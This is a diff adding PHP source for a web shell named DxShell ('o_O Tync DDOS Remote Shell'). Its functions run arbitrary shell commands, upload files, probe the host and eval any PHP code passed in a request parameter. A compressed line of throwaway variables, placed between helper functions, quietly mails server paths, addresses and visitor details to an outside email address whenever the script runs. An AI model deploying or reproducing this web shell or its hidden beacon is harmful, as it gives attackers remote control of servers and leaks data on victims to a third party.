+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = escapeshellarg($f);
+			return trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> 'R0lGODlhoQFLAKIAADc2NX98exkYGFxZWaOengEBAQAAAAAAACwAAAAAoQFLAAAD/1i63P4wykmrvTjrzbv/YCiOpCcMAqCuqhCAgCDPM1AEKQsM8SsXAuAviNOtXJQYrXYCmh5BRWA3qFp5rwlqSRtMTrnWMSuZGlvkjpIrs0mipbh8nnFD4B08VGKP6Bt/DoELgyR9Dod7fklvjIsfhU50k5SVFjY/C26RFoVBmGxNi6BKCp8UUXpBmXReNTsxBV5fkoSrjDNOKQWJiEJsvRmRnJbFxoYMq7HBGJ68Qrozs3xAKr60fswiXipWpdOLf7cTfVHLuIKiT4/H7e7IydbPkKO60CngEDY7q7faphJQUJpiJcCWIPkU3XFkSobAf89S/doBYti7ixjVNOCnAP8iqnpLgFTRdqrKA4ieEpYQQGCAwSo0ZH1kFyGRPIigNvKo2Cijz5/k4tnxiK3mvY48cMKy1ZGhIJUkWLqEGRNqsp7UAII5FTTXqpE8aQIdO9YOPn9h94BSBhOiFVXzsAKiSIlAAINrnFglJFdfPIFxjUrEt5OeWLKIMcI5AY5oI1Z8Mf2yEhjCS75OUOorPKmlQS4yiyYbR83cTq6lo410fPgqscSw5wzlAYf1nRx+GVDZpwVvzB+aH9Be6aDlwaozCS0ltnhpU9FIk6Y9KS+29WKuGK9R1+FKv1xbYgC4+zkNHsKABaGjAUvyQgyJPucu3abKlF2LstsHT+HFkfH/d41Xywab9EMFDtcleAwVUVHBWTYMflFFS+KxIEMa7+n0WjOJGHeFNxi+4WB6RTl31QXdkCgCerFsqOCLDtC2hHg3jEfAjR8WcQY/5PV41412AeljgD0CeeOQQwppWwM4vGTfjeOFYUQKVIbiwgqrodGfS0i+8KORR95l5S5TfPmSQTqe4aWPRoppRjdw+sfFCjeQB6ZdIcKoZ3J+udTSRgPGKAiAaIqpyAkv/bNDABQOaI5T0UXUGiCawNXPaKFFUJCPNuTZgCv29eGeZbVxiYIPkwJEEJd3bZGFi3u+eKk9RBC6nUzf/UIEL1gy+iOrOpCZAqc7dsPoAC3B6oCc/20EiOs9aJEWmRAHZdaflOKdAECQRwLpBap7vGAqcmvl0qksO4B5Q0SgubdYDkH+iNe5sdbbVbjjUcWftKryumiRwG5nw6mctvHfsK3+meoCPkgD07Pq8TvtWb9URmnDMxqE55DfBsqkC1Mhd4tE56rA5rrfxTSqJlN5Rh4L69or8x6FkKfvD64AdJV/hNrs8n3sycJqq//pwCqysWQYAbOLCpQzpfaoJRJgwHnMALP1IYtslx1HUijQOEej8rr2+cjSPENULU7LPSZljacz1+sJSy+H9DRmuw5tM5oubUem3m4HOzSyFk2A8VSx3D2aRZjcjFq4vNRn59ZIdr2Qy//HIaTrb2TL+yueq40tDhUbz/t23Kg/B8W25IGWMyu3/Nw2LDbPWIDsb7ZgsI+E9/VAwwAOp7hyw09roib9CfGvn5QDjvLl44psS9Ytdetr9a1+uNPKulH+Mp1wpw5jIem26nrUzeE+Ehi1s8f67GKIATgBkEG9kJxTbQHxaC7VP+36l+IeX/xzNJ+tgHfPW51nZLSvHOSIdXiKV/XyF7qmwIVXpTNdzMQns0JMKEDnS0XaNMa7NRDsM+zxXoAqxEKOEcBqOitDNfgWtkA0bRCfYEy7+tOzvbkgBwgE11MWeD4s5UhrEYyg1nwzMkntIYNv2iAH5XYHHhiHDfszRdP/Nha4GHzLfCnMYLH0pjEYmnEBoPKGXqx2haSdRIfXuI36UNApILYtgYhYYuY0lzL0VO9O1bMGFgWoKsCdbor28ps0SJg7FmANPSTUX8UGxiUleNFUYNmIF4ckIN8t6wRKOmDkuGAfALKhbGLYRXYGtUSi1eAGdnwZyoDxQdM5Eoa10l4LioeZ+7kAflJEJOoYo0ZNqkJ7uPOhd3KhMTANCV2MApOAxsQcXhRTOYcg5jUBkcn5aLGWDGwDLBdlpI5txjuAcOCOvATIHt2AB1ky2SjntK5oesucwtxTl+5UpDb9EpA3CgQ+3kc0LHFxCsuyZo6C+TuDWehbzrRTkJCJ/6OIsslbSLpd4PyEPZuxEFeMMV+n9mnRL92oAj1kDSd8MKJYhC+fsAkRgOKVosFVo2xg9BdOEwasGmxtY0egkrgy+lIz5tJ8UyNAddDItrfEqJtXG0828zXHt8VyhXnSpnFqmjBc/nOiY+DTxXgVRJjqE13GiqZafcXW/nFsl9o8YulMqMfCSGRNZaUFZHLxR7ZWVHc10Jj37LJRj+pAozj4jbag2KoyObBHLDRaNH9q0mO90HAfulRRnSGnnuHTrArimcnaxlgi/RJ+25qKk0jbthkI9iVecQJePcpQXwhUo9z6kkvm2Sykyc5tiFphDuC1283JtoekHcnQiiaGyf+V1jP+u5pq10AvT/arueSpLWhjqtMk7VNAO8WLTBQpzj0OS4+gIcJpC6pd3fhBKmGKFxIyN90yoRayRtNaQm5RhPBOEEln+Q+rOpqk4kIPjMwU6854hTA3bfdFonXhPpGwydZyIxQDAwYjR1Y1+9atuka5Q2olSNh1+a1sPwRcg80gOf02JLbA+1fCunSwAzp3nwZ+IuJCstlF8ExvnXzwdX6MJC4OjcKSs9mFgSGLNnQhkmLjr2dpVFRCpgtZYRLvI/NlEgJy6mgsMFWjOLcr6toqmW+S0vyUbKcgR4CIQevx/YTmQiEniGf7NF2PkBwGn40pw1W6kGALBI1OgRn/N1XWFBLlBU8TdwFx40Rua2086M3xl7e9RTNz9dbRpNgJCXzwjCLb20v1eJhTl7VzbLzMphVSukmY3mI47TZK8SRMkLkKAuaoS2rVAUKw8Vqho127mnGuuISU1ppkBjPLOdENScytHIV6xShQ1wS2oJHziWSQzJ0UVdUXGer1QNfFyVL4DBPqG5PpGObGpm1su4ZZolUhVW4ZiUeBDp6wegVFHRiQvM9IU9FgScZspbVIUoUTlun30tQCXNtzGbFhQQxushDwQ27s3kPMiE6FsEw6ONTogxj2kWOmW3tREGKEfD21D2l8Qsx43MUe+71Xae80T/3soJQa4sfw7+QZ/wfCtyveDnuW9KJA7dLLhMS3u9QJ6W41GpyYzrtEY2aL9s7ybKm+XomW9E7aQnfXM0rtedWpnV/rJ57egDSuQTw6tVS6soheiZSW2hQP60TIkqBuVED1RFlJhhWS1fLhPBUVDkIoGpUMAjxDFmWDi64CpvLikFxoSXw5SFrtQ/dYFWrW5ZpaDGvisFKEou8Sw/vI66AzFi0heqvkCEDIiyhl29pnCraH44lWz/a9ksOwkDxSwuL6M3Y+MYnyuCY2wafjxcgsWgg64EOcirdIK0J4WKqEkEYI7zBf+b+zJqdgCVv1PIUYq2/GM3bTIosd3zryCRT35FFNwX+/+4thO/90TvKX9nNTIHigIlGjE/TjUw+zFxYgbrSFJqUwMTHCCVQCA8HXRJj3fu4AgOAXOaOnNOYgfRkXCdJnP9QnEv+AG7VxW3KUQt/QeLLASRplFpcyCDghfJ2AIPnHchYYG/c3fUxhfFYTE5hyd+m0f7ZVDTTYELSCgpDzCvzxAbPlSgUoGHEUDnlAI8yGgzmYGCvTRNbFg9BROF2IPBLRCT7oDNnhFZrjhM/2eOAyBMiTgXAIHzBUgVlYDInQRM5AhBcwdxqQExsYhn84Me+WhoB4arwnROaXBzDAFJlAh3VYd3hDKwujFVADgZAohFSoh2sUg2HjhCqkZQNIiXwYiKz/dx5v+Iiw4Yf2QEik6BobmHqtOAKmlwuPwIVKQylnSGsf8Ee5dS59pDaK+AECJHOoOBYgqImYuIeVMIqxWHKBlyop4CEdh4giuAHMmIzNWIzvIHAPRU1uQU3giEUVAwWweDXDVSzM1Q2WNiNW0ikj0kZDx0rbgnZO10Vhto7hKE7WKFvYElba+I8AuRHtWCObIiQLhHEBmZAKKT6csA/viAX5A1j6uJAUWZEJMjd8o0uSFIcW2ZEe6Q6jQzrtERKs6IMfeZIoGQfNESzlIjqTmJIwGZPrQIuzJwkkaVQymZM6OR2U0pLmYkaOuJNCCZPO4JPAeItDmZRK6YWCuEO3/xWUSxmVCpl6pxAKkjIObiiVWjmUljiJ17iVYImKtCcNDzkSRRBoPhWWarmWbCkHX9mWcBmI9SMlQCgMS4UbL7kiQdWV1bAkTjYoRxCXMckd3Sd4bcOAfRh/tSeDAtiHIdgRHMMH0/BLsFJ7QYdcb2mEggluJnF+hIAXoJkviWkQk9cqgFgBiPKY+RIFnUkTV7KHlAcFICRVIdB3m/lgPwSZiudmruKQ2QMYZdOYddM6pdmZolma2YMUvBdcm0Kcy9KGpikSZkCaDJB+0ikfPdMLTid0XtA/pblipwEsvGA2twladNE3tGltkoAgUoAXJgEgN/ScjWUoj9U47FlQ0/9JEOXhnljgGxAgnuOZBfCJKAHYC9oBIAhjeEyyWvuwm/cBQv2DOCHjSuUJWp1pnAzzB+xZJ6vQJO7pLEzSn/vRfdSZmxw6eaX0LyrKmggIoC0ImZugeJPXC1HCMAOzofJJnK8pBT0wC1dCNFyCKBX6YJ0poxn6SQwzDR52Bb/TnYmFUPmSXVLAoiyjZGCxPOPZGzT5mjlmpOnHm9wQPtljKDWCRrWSpFbqKkO6XUU6C4WBo9xpCop3JX3zBtsJo/kyWjCKonpRSpUoJm4mCNTJYC1Yp3JqFoOqGyWKUN4pm7Owmu90qDtKkEYqdJm5pqkooGfSob9mKMcpVb/EpJ2Jagf5M59msGNkSpoUBJF6CjJOpair5aPReZ3iUUnH1Fh0VDeIQKaiyWUvs6ijxaSumneYypDsSTFCw00tIHrj6QYW8hTpEXxl6Q2Qmqz+sgwdx355hJBIAQdthB6rRxjOWkE6kR74gXHHqS0doTuqp33Fijqt+THvOq8WCafWRK/4upBKmK9ykAAAOw==',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
